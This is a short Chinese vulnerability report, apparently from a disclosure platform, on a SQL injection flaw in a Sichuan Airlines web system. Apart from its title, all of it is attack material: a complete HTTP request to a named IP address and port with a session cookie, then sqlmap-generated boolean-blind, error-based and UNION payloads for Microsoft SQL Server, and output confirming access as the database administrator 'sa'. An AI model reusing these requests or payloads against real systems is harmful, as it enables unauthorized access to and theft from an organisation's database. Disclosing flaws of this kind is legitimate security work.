四川航空某处存在SQL注入（sa权限）

POST /website/report/getPlatFormItemList HTTP/1.1
 Host: 182.151.210.184:8888
 Accept: application/json, text/javascript, */*; q=0.01
 Proxy-Connection: keep-alive
 X-Requested-With: XMLHttpRequest
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-cn
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 Origin: http://182.151.210.184:8888
 Content-Length: 20
 Connection: keep-alive
 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_0 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13A342
 Referer: http://182.151.210.184:8888/website/report/add
 Cookie: JSESSIONID=93DA0CDFB33954BA9D3B70C2C8F45522
 
 platCataID=1

Parameter: platCataID (POST)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: platCataID=1 AND 9471=9471
 
     Type: error-based
     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
     Payload: platCataID=1 AND 7885=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(
 118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7885=7885) THEN CHAR(49) ELSE CHAR(
 48) END))+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(106)+CHAR(113)))
 
     Type: UNION query
     Title: Generic UNION query (NULL) - 5 columns
     Payload: platCataID=1 UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(11
 8)+CHAR(113)+CHAR(100)+CHAR(67)+CHAR(121)+CHAR(113)+CHAR(117)+CHAR(78)+CHAR(100)
 +CHAR(105)+CHAR(65)+CHAR(74)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(106)+CHAR(113),N
 ULL,NULL,NULL,NULL--
 ---
 [17:14:52] [INFO] the back-end DBMS is Microsoft SQL Server
 web application technology: JSP
 back-end DBMS: Microsoft SQL Server 2005
 [17:14:52] [INFO] fetching current user
 current user:    'sa'
 [17:14:52] [INFO] fetched data logged to text files under 'C:/Users/********/.sqlmap/output/182.151.210.184'
 
 [*] shutting down at 17:14:52